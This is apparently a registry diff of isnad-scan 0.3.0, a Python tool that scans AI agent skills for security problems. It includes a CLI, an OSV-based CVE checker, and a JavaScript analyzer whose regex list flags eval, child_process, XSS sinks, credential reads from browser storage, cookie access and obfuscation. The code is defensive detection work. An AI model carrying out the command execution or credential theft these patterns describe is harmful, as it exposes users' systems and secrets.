isnad-scan 0.3.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
isnad_scan/cli.py ADDED
@@ -0,0 +1,221 @@
1
+ """CLI entry point for ISNAD Skill Scanner."""
2
+ import json
3
+ import sys
4
+ from typing import Optional
5
+
6
+ import click
7
+ from rich.console import Console
8
+ from rich.table import Table
9
+ from rich.panel import Panel
10
+ from rich.text import Text
11
+
12
+ from . import __version__
13
+ from .scanner import scan_skill, ScanResult
14
+ from .patterns import Severity
15
+
16
+
17
+ console = Console()
18
+
19
+
20
+ def format_severity(severity: Severity) -> Text:
21
+ """Format severity with color."""
22
+ colors = {
23
+ Severity.DANGER: "red bold",
24
+ Severity.WARN: "yellow",
25
+ Severity.INFO: "blue",
26
+ }
27
+ return Text(severity.value.upper(), style=colors.get(severity, "white"))
28
+
29
+
30
+ def format_trust_level(level: str) -> Text:
31
+ """Format trust level with color and emoji."""
32
+ config = {
33
+ "DANGER": ("🚨", "red bold"),
34
+ "WARN": ("āš ļø ", "yellow bold"),
35
+ "CAUTION": ("⚔", "yellow"),
36
+ "SAFE": ("āœ…", "green bold"),
37
+ }
38
+ emoji, style = config.get(level, ("", "white"))
39
+ return Text(f"{emoji} {level}", style=style)
40
+
41
+
42
+ def print_result(result: ScanResult, verbose: bool = False, show_hash: bool = False):
43
+ """Print scan result in human-readable format."""
44
+ console.print()
45
+
46
+ # Header with trust level
47
+ level_text = format_trust_level(result.trust_level)
48
+ console.print(Panel(
49
+ Text.assemble("Trust Level: ", level_text),
50
+ title=f"[bold]ISNAD Scan: {result.path}[/bold]",
51
+ border_style="blue"
52
+ ))
53
+
54
+ # Summary stats
55
+ summary = result.summary()
56
+ console.print(f"\nšŸ“ Files scanned: {summary['files_scanned']}")
57
+ console.print(f"ā­ļø Files skipped: {summary['files_skipped']}")
58
+
59
+ if show_hash and result.content_hash:
60
+ console.print(f"šŸ”‘ Content hash: {result.content_hash}")
61
+
62
+ # Findings summary
63
+ findings = summary['findings']
64
+ if findings['danger'] > 0:
65
+ console.print(f"🚨 [red bold]DANGER findings: {findings['danger']}[/red bold]")
66
+ if findings['warn'] > 0:
67
+ console.print(f"āš ļø [yellow]WARN findings: {findings['warn']}[/yellow]")
68
+ if findings['info'] > 0 and verbose:
69
+ console.print(f"ā„¹ļø [blue]INFO findings: {findings['info']}[/blue]")
70
+
71
+ # Symlinks
72
+ if result.symlinks_found:
73
+ console.print(f"šŸ”— [red]Unsafe symlinks: {len(result.symlinks_found)}[/red]")
74
+
75
+ # Warnings
76
+ if result.warnings and verbose:
77
+ console.print(f"⚔ Warnings: {len(result.warnings)}")
78
+
79
+ # Detailed findings grouped by severity
80
+ if result.findings:
81
+ console.print("\n[bold]Findings:[/bold]\n")
82
+
83
+ # Group and sort by severity
84
+ for severity in [Severity.DANGER, Severity.WARN, Severity.INFO]:
85
+ severity_findings = [f for f in result.findings if f.severity == severity]
86
+
87
+ if not severity_findings:
88
+ continue
89
+
90
+ if severity == Severity.INFO and not verbose:
91
+ continue
92
+
93
+ # Deduplicate similar findings
94
+ seen_patterns = {}
95
+ for finding in severity_findings:
96
+ key = (finding.pattern_id, finding.file)
97
+ if key not in seen_patterns:
98
+ seen_patterns[key] = []
99
+ seen_patterns[key].append(finding)
100
+
101
+ for (pattern_id, file), file_findings in seen_patterns.items():
102
+ sev_text = format_severity(file_findings[0].severity)
103
+
104
+ if len(file_findings) == 1:
105
+ f = file_findings[0]
106
+ console.print(Text.assemble(
107
+ "[", sev_text, "] ",
108
+ f"{f.file}:{f.line} — ",
109
+ (f.pattern_id, "cyan"),
110
+ ))
111
+ console.print(f" {f.description}")
112
+ if f.context and verbose:
113
+ console.print(f" [dim]{f.context}[/dim]")
114
+ else:
115
+ # Multiple occurrences
116
+ lines = [str(f.line) for f in file_findings[:5]]
117
+ line_str = ",".join(lines) + ("..." if len(file_findings) > 5 else "")
118
+ console.print(Text.assemble(
119
+ "[", sev_text, "] ",
120
+ f"{file}:{{{line_str}}} — ",
121
+ (pattern_id, "cyan"),
122
+ f" ({len(file_findings)} occurrences)",
123
+ ))
124
+ console.print(f" {file_findings[0].description}")
125
+
126
+ console.print()
127
+
128
+ # Errors
129
+ if result.errors:
130
+ console.print("[red bold]Errors:[/red bold]")
131
+ for error in result.errors:
132
+ console.print(f" āŒ {error}")
133
+
134
+ # Warnings (verbose only)
135
+ if result.warnings and verbose:
136
+ console.print("\n[yellow]Warnings:[/yellow]")
137
+ for warning in result.warnings:
138
+ console.print(f" ⚔ {warning}")
139
+
140
+ console.print()
141
+
142
+
143
+ def print_json(result: ScanResult):
144
+ """Print scan result as JSON."""
145
+ output = {
146
+ "version": __version__,
147
+ "path": result.path,
148
+ "trust_level": result.trust_level,
149
+ "content_hash": result.content_hash,
150
+ "summary": result.summary(),
151
+ "findings": [
152
+ {
153
+ "severity": f.severity.value,
154
+ "pattern_id": f.pattern_id,
155
+ "description": f.description,
156
+ "file": f.file,
157
+ "line": f.line,
158
+ "match": f.match,
159
+ "context": f.context,
160
+ }
161
+ for f in result.findings
162
+ ],
163
+ "symlinks": result.symlinks_found,
164
+ "errors": result.errors,
165
+ "warnings": result.warnings,
166
+ }
167
+ print(json.dumps(output, indent=2))
168
+
169
+
170
+ @click.command()
171
+ @click.argument('path')
172
+ @click.option('--json', 'output_json', is_flag=True, help='Output as JSON')
173
+ @click.option('--verbose', '-v', is_flag=True, help='Show INFO findings and extra details')
174
+ @click.option('--hash', 'show_hash', is_flag=True, help='Show content hash')
175
+ @click.option('--version', is_flag=True, help='Show version')
176
+ @click.option('--quiet', '-q', is_flag=True, help='Only output trust level')
177
+ @click.option('--cve', 'check_cves', is_flag=True, help='Check dependencies against CVE database (requires network)')
178
+ def main(path: str, output_json: bool, verbose: bool, show_hash: bool, version: bool, quiet: bool, check_cves: bool):
179
+ """
180
+ Scan an agent skill for security issues.
181
+
182
+ PATH can be a local directory or file.
183
+
184
+ \b
185
+ Exit codes:
186
+ 0 = SAFE - No issues found
187
+ 1 = CAUTION - Minor issues, review recommended
188
+ 2 = DANGER - Security issues detected
189
+ 3 = ERROR - Scanner error
190
+
191
+ \b
192
+ Examples:
193
+ isnad-scan ./skills/my-skill/
194
+ isnad-scan ./skills/my-skill/ --json
195
+ isnad-scan ./skills/my-skill/ -v --hash
196
+ """
197
+ if version:
198
+ print(f"isnad-scan {__version__}")
199
+ sys.exit(0)
200
+
201
+ try:
202
+ result = scan_skill(path, check_cves=check_cves)
203
+ except Exception as e:
204
+ if output_json:
205
+ print(json.dumps({"error": str(e)}))
206
+ else:
207
+ console.print(f"[red]Error:[/red] {e}")
208
+ sys.exit(3)
209
+
210
+ if quiet:
211
+ print(result.trust_level)
212
+ elif output_json:
213
+ print_json(result)
214
+ else:
215
+ print_result(result, verbose=verbose, show_hash=show_hash)
216
+
217
+ sys.exit(result.exit_code)
218
+
219
+
220
+ if __name__ == "__main__":
221
+ main()
@@ -0,0 +1,238 @@
1
+ """CVE database integration using OSV (Open Source Vulnerabilities).
2
+
3
+ Checks dependencies against known vulnerabilities without requiring API keys.
4
+ Uses the OSV.dev API which covers PyPI, npm, and other ecosystems.
5
+ """
6
+ import json
7
+ import re
8
+ import urllib.request
9
+ import urllib.error
10
+ from dataclasses import dataclass
11
+ from typing import List, Optional, Dict, Tuple
12
+ from pathlib import Path
13
+
14
+ from .patterns import Finding, Severity
15
+
16
+
17
+ OSV_API_URL = "https://api.osv.dev/v1/query"
18
+ OSV_BATCH_URL = "https://api.osv.dev/v1/querybatch"
19
+
20
+ # Cache for OSV responses (in-memory, per-session)
21
+ _osv_cache: Dict[str, List[dict]] = {}
22
+
23
+
24
+ @dataclass
25
+ class PackageVersion:
26
+ """A package with optional version constraint."""
27
+ name: str
28
+ version: Optional[str] = None
29
+ ecosystem: str = "PyPI" # PyPI, npm, Go, etc.
30
+
31
+ def to_osv_query(self) -> dict:
32
+ """Convert to OSV API query format."""
33
+ query = {
34
+ "package": {
35
+ "name": self.name,
36
+ "ecosystem": self.ecosystem,
37
+ }
38
+ }
39
+ if self.version:
40
+ query["version"] = self.version
41
+ return query
42
+
43
+
44
+ def parse_requirements_txt(content: str) -> List[PackageVersion]:
45
+ """Parse requirements.txt format."""
46
+ packages = []
47
+
48
+ for line in content.split('\n'):
49
+ line = line.strip()
50
+
51
+ # Skip comments and empty lines
52
+ if not line or line.startswith('#') or line.startswith('-'):
53
+ continue
54
+
55
+ # Skip URLs and paths
56
+ if line.startswith(('http://', 'https://', 'git+', '/', '.')):
57
+ continue
58
+
59
+ # Parse package==version, package>=version, etc.
60
+ match = re.match(r'^([a-zA-Z0-9_-]+)\s*(?:[=<>!~]+\s*([0-9][a-zA-Z0-9._-]*))?', line)
61
+ if match:
62
+ name = match.group(1).lower()
63
+ version = match.group(2)
64
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
65
+
66
+ return packages
67
+
68
+
69
+ def parse_package_json(content: str) -> List[PackageVersion]:
70
+ """Parse package.json dependencies."""
71
+ packages = []
72
+
73
+ try:
74
+ data = json.loads(content)
75
+ except json.JSONDecodeError:
76
+ return packages
77
+
78
+ for dep_key in ('dependencies', 'devDependencies', 'peerDependencies'):
79
+ deps = data.get(dep_key, {})
80
+ for name, version_spec in deps.items():
81
+ # Extract version number from spec like "^1.2.3", "~1.2.3", ">=1.0.0"
82
+ version_match = re.search(r'(\d+\.\d+\.\d+)', version_spec)
83
+ version = version_match.group(1) if version_match else None
84
+ packages.append(PackageVersion(name=name, version=version, ecosystem="npm"))
85
+
86
+ return packages
87
+
88
+
89
+ def parse_pyproject_toml(content: str) -> List[PackageVersion]:
90
+ """Parse pyproject.toml dependencies (simple parsing, not full TOML)."""
91
+ packages = []
92
+
93
+ in_deps = False
94
+ for line in content.split('\n'):
95
+ line = line.strip()
96
+
97
+ if line.startswith('[') and 'dependencies' in line.lower():
98
+ in_deps = True
99
+ continue
100
+ elif line.startswith('['):
101
+ in_deps = False
102
+ continue
103
+
104
+ if in_deps and '=' in line:
105
+ # Handle: package = ">=1.0"
106
+ match = re.match(r'^([a-zA-Z0-9_-]+)\s*=\s*["\']?([^"\']+)?', line)
107
+ if match:
108
+ name = match.group(1).lower()
109
+ version_spec = match.group(2) or ''
110
+ version_match = re.search(r'(\d+\.\d+\.?\d*)', version_spec)
111
+ version = version_match.group(1) if version_match else None
112
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
113
+ elif in_deps and line and not line.startswith('#'):
114
+ # Handle list format: "package>=1.0",
115
+ match = re.match(r'^["\']?([a-zA-Z0-9_-]+)', line)
116
+ if match:
117
+ name = match.group(1).lower()
118
+ version_match = re.search(r'(\d+\.\d+\.?\d*)', line)
119
+ version = version_match.group(1) if version_match else None
120
+ packages.append(PackageVersion(name=name, version=version, ecosystem="PyPI"))
121
+
122
+ return packages
123
+
124
+
125
+ def query_osv(packages: List[PackageVersion], timeout: float = 10.0) -> Dict[str, List[dict]]:
126
+ """Query OSV API for vulnerabilities in packages."""
127
+ if not packages:
128
+ return {}
129
+
130
+ results = {}
131
+
132
+ # Use batch API for efficiency
133
+ queries = [pkg.to_osv_query() for pkg in packages]
134
+
135
+ try:
136
+ request_data = json.dumps({"queries": queries}).encode('utf-8')
137
+ req = urllib.request.Request(
138
+ OSV_BATCH_URL,
139
+ data=request_data,
140
+ headers={'Content-Type': 'application/json'},
141
+ method='POST'
142
+ )
143
+
144
+ with urllib.request.urlopen(req, timeout=timeout) as response:
145
+ data = json.loads(response.read())
146
+ except (urllib.error.URLError, urllib.error.HTTPError, TimeoutError, json.JSONDecodeError) as e:
147
+ # Network error - return empty but don't fail the scan
148
+ return {}
149
+
150
+ # Parse batch response
151
+ for i, result in enumerate(data.get('results', [])):
152
+ if i < len(packages):
153
+ vulns = result.get('vulns', [])
154
+ if vulns:
155
+ pkg = packages[i]
156
+ key = f"{pkg.ecosystem}:{pkg.name}"
157
+ results[key] = vulns
158
+
159
+ return results
160
+
161
+
162
+ def check_dependencies_for_cves(content: str, filename: str, timeout: float = 10.0) -> List[Finding]:
163
+ """Check a dependency file for known CVEs."""
164
+ findings = []
165
+
166
+ # Parse based on file type
167
+ fname = Path(filename).name.lower()
168
+
169
+ if fname == 'requirements.txt' or fname.startswith('requirements'):
170
+ packages = parse_requirements_txt(content)
171
+ elif fname == 'package.json':
172
+ packages = parse_package_json(content)
173
+ elif fname == 'pyproject.toml':
174
+ packages = parse_pyproject_toml(content)
175
+ else:
176
+ return findings
177
+
178
+ if not packages:
179
+ return findings
180
+
181
+ # Query OSV for vulnerabilities
182
+ vulns_by_pkg = query_osv(packages, timeout=timeout)
183
+
184
+ # Generate findings for vulnerable packages
185
+ for pkg in packages:
186
+ key = f"{pkg.ecosystem}:{pkg.name}"
187
+ vulns = vulns_by_pkg.get(key, [])
188
+
189
+ for vuln in vulns:
190
+ vuln_id = vuln.get('id', 'UNKNOWN')
191
+ summary = vuln.get('summary', 'No summary available')
192
+ severity_data = vuln.get('severity', [])
193
+
194
+ # Determine severity from CVSS if available
195
+ severity = Severity.WARN
196
+ cvss_score = None
197
+ for s in severity_data:
198
+ if 'score' in s:
199
+ try:
200
+ cvss_score = float(s['score'])
201
+ if cvss_score >= 9.0:
202
+ severity = Severity.DANGER
203
+ elif cvss_score >= 7.0:
204
+ severity = Severity.DANGER
205
+ elif cvss_score >= 4.0:
206
+ severity = Severity.WARN
207
+ except (ValueError, TypeError):
208
+ pass
209
+
210
+ # High severity CVEs are DANGER
211
+ if vuln_id.startswith('CVE-') or vuln_id.startswith('GHSA-'):
212
+ if any(kw in summary.lower() for kw in ('remote code', 'rce', 'arbitrary code', 'command injection', 'sql injection')):
213
+ severity = Severity.DANGER
214
+
215
+ findings.append(Finding(
216
+ severity=severity,
217
+ pattern_id='known_vulnerability',
218
+ description=f'{vuln_id}: {summary[:150]}',
219
+ file=filename,
220
+ line=1, # We don't track line numbers in deps
221
+ match=f'{pkg.name}=={pkg.version}' if pkg.version else pkg.name,
222
+ context=f'CVSS: {cvss_score}' if cvss_score else '',
223
+ ))
224
+
225
+ return findings
226
+
227
+
228
+ def check_cves_enabled() -> bool:
229
+ """Check if CVE checking is available (has network access)."""
230
+ try:
231
+ req = urllib.request.Request(
232
+ "https://api.osv.dev/v1/",
233
+ method='HEAD'
234
+ )
235
+ with urllib.request.urlopen(req, timeout=2.0):
236
+ return True
237
+ except Exception:
238
+ return False
@@ -0,0 +1,154 @@
1
+ """JavaScript-specific analysis including minified code handling.
2
+
3
+ Handles:
4
+ - Minified/bundled JS detection and basic unminification
5
+ - JS-specific dangerous patterns
6
+ - Node.js specific risks
7
+ """
8
+ import re
9
+ from typing import List, Tuple
10
+
11
+ from .patterns import Finding, Severity
12
+
13
+
14
+ def is_minified_js(content: str) -> bool:
15
+ """Detect if JavaScript content is minified."""
16
+ lines = content.split('\n')
17
+
18
+ # If file has very few lines but lots of content, likely minified
19
+ if len(lines) < 10 and len(content) > 5000:
20
+ return True
21
+
22
+ # Check average line length (minified = very long lines)
23
+ non_empty_lines = [l for l in lines if l.strip()]
24
+ if non_empty_lines:
25
+ avg_length = sum(len(l) for l in non_empty_lines) / len(non_empty_lines)
26
+ if avg_length > 500:
27
+ return True
28
+
29
+ # Check for lack of whitespace (minified removes most whitespace)
30
+ if len(content) > 1000:
31
+ whitespace_ratio = content.count(' ') / len(content)
32
+ if whitespace_ratio < 0.05:
33
+ return True
34
+
35
+ return False
36
+
37
+
38
+ def basic_unminify(content: str) -> str:
39
+ """
40
+ Basic unminification to make patterns more detectable.
41
+ This is NOT a full beautifier, just enough to expose dangerous patterns.
42
+ """
43
+ # Add newlines after common statement endings
44
+ content = re.sub(r';(?=[^\s])', ';\n', content)
45
+ content = re.sub(r'\{(?=[^\s])', '{\n', content)
46
+ content = re.sub(r'\}(?=[^\s])', '}\n', content)
47
+
48
+ # Add spaces around operators to expose patterns
49
+ content = re.sub(r'([=<>!]+)', r' \1 ', content)
50
+
51
+ return content
52
+
53
+
54
+ def analyze_javascript(content: str, filename: str) -> List[Finding]:
55
+ """Analyze JavaScript code for dangerous patterns."""
56
+ findings = []
57
+ original_content = content
58
+
59
+ # Check if minified
60
+ minified = is_minified_js(content)
61
+ if minified:
62
+ findings.append(Finding(
63
+ severity=Severity.WARN,
64
+ pattern_id='minified_javascript',
65
+ description='Minified JavaScript detected - harder to audit, may hide malicious code',
66
+ file=filename,
67
+ line=1,
68
+ match='<minified>',
69
+ context=f'File size: {len(content)} bytes, few lines',
70
+ ))
71
+ # Unminify for analysis
72
+ content = basic_unminify(content)
73
+
74
+ lines = content.split('\n')
75
+
76
+ # JS-specific patterns that need context
77
+ js_patterns = [
78
+ # Dynamic code execution
79
+ (r'\beval\s*\(', 'js_eval', Severity.DANGER, 'eval() in JavaScript'),
80
+ (r'new\s+Function\s*\(', 'js_function_constructor', Severity.DANGER, 'Function constructor (eval equivalent)'),
81
+ (r'setTimeout\s*\(\s*["\'][^"\']*["\']', 'js_settimeout_string', Severity.DANGER, 'setTimeout with string (implicit eval)'),
82
+ (r'setInterval\s*\(\s*["\'][^"\']*["\']', 'js_setinterval_string', Severity.DANGER, 'setInterval with string (implicit eval)'),
83
+
84
+ # Dangerous Node.js APIs
85
+ (r'child_process', 'js_child_process', Severity.WARN, 'child_process module - command execution'),
86
+ (r'\.exec\s*\(', 'js_exec', Severity.WARN, 'exec() call - may be command execution'),
87
+ (r'\.execSync\s*\(', 'js_exec_sync', Severity.DANGER, 'execSync() - synchronous command execution'),
88
+ (r'require\s*\(\s*["\']child_process["\']', 'js_require_child_process', Severity.DANGER, 'Requiring child_process module'),
89
+
90
+ # Prototype pollution
91
+ (r'__proto__', 'js_proto_access', Severity.WARN, '__proto__ access - prototype pollution risk'),
92
+ (r'constructor\s*\[\s*["\']prototype["\']', 'js_constructor_proto', Severity.DANGER, 'Prototype access via constructor'),
93
+ (r'Object\.assign\s*\([^,]+,\s*[^)]+\)', 'js_object_assign', Severity.INFO, 'Object.assign - check for prototype pollution'),
94
+
95
+ # DOM XSS sinks
96
+ (r'\.innerHTML\s*=', 'js_innerhtml', Severity.WARN, 'innerHTML assignment - XSS risk'),
97
+ (r'\.outerHTML\s*=', 'js_outerhtml', Severity.WARN, 'outerHTML assignment - XSS risk'),
98
+ (r'document\.write\s*\(', 'js_document_write', Severity.WARN, 'document.write - XSS risk'),
99
+ (r'\.insertAdjacentHTML\s*\(', 'js_insert_html', Severity.WARN, 'insertAdjacentHTML - XSS risk'),
100
+
101
+ # Dangerous URL handling
102
+ (r'location\s*=|location\.href\s*=', 'js_location_assign', Severity.WARN, 'Location assignment - open redirect risk'),
103
+ (r'window\.open\s*\(', 'js_window_open', Severity.INFO, 'window.open - popup/redirect'),
104
+
105
+ # Fetch/XHR to unknown destinations
106
+ (r'fetch\s*\(\s*[^"\'`]', 'js_fetch_dynamic', Severity.WARN, 'Fetch with dynamic URL'),
107
+ (r'XMLHttpRequest', 'js_xhr', Severity.INFO, 'XMLHttpRequest usage'),
108
+
109
+ # Credential access patterns
110
+ (r'localStorage\.getItem\s*\([^)]*(?:token|key|secret|password|credential)', 'js_localstorage_cred', Severity.WARN, 'Reading credentials from localStorage'),
111
+ (r'sessionStorage\.getItem\s*\([^)]*(?:token|key|secret|password|credential)', 'js_sessionstorage_cred', Severity.WARN, 'Reading credentials from sessionStorage'),
112
+ (r'document\.cookie', 'js_cookie_access', Severity.INFO, 'Cookie access'),
113
+
114
+ # WebSocket (may exfiltrate data)
115
+ (r'new\s+WebSocket\s*\(', 'js_websocket', Severity.INFO, 'WebSocket connection'),
116
+
117
+ # Obfuscation indicators
118
+ (r'\\x[0-9a-fA-F]{2}(\\x[0-9a-fA-F]{2}){5,}', 'js_hex_string', Severity.WARN, 'Hex-encoded string in JS'),
119
+ (r'\\u[0-9a-fA-F]{4}(\\u[0-9a-fA-F]{4}){5,}', 'js_unicode_string', Severity.WARN, 'Unicode-encoded string in JS'),
120
+ (r'atob\s*\(', 'js_atob', Severity.WARN, 'Base64 decoding (atob)'),
121
+ (r'String\.fromCharCode\s*\([^)]{20,}\)', 'js_fromcharcode', Severity.WARN, 'String.fromCharCode - potential obfuscation'),
122
+ ]
123
+
124
+ for pattern, pattern_id, severity, description in js_patterns:
125
+ for match in re.finditer(pattern, content, re.IGNORECASE):
126
+ # Find line number in potentially unminified content
127
+ line_num = content[:match.start()].count('\n') + 1
128
+
129
+ # Get context
130
+ if line_num <= len(lines):
131
+ context = lines[line_num - 1].strip()[:200]
132
+ else:
133
+ context = match.group(0)[:100]
134
+
135
+ # Note if found in minified code
136
+ if minified:
137
+ description += ' (found in minified code)'
138
+
139
+ findings.append(Finding(
140
+ severity=severity,
141
+ pattern_id=pattern_id,
142
+ description=description,
143
+ file=filename,
144
+ line=line_num,
145
+ match=match.group(0)[:100],
146
+ context=context,
147
+ ))
148
+
149
+ return findings
150
+
151
+
152
+ def is_javascript_file(filename: str) -> bool:
153
+ """Check if a file is JavaScript."""
154
+ return filename.endswith(('.js', '.mjs', '.cjs', '.jsx', '.ts', '.tsx'))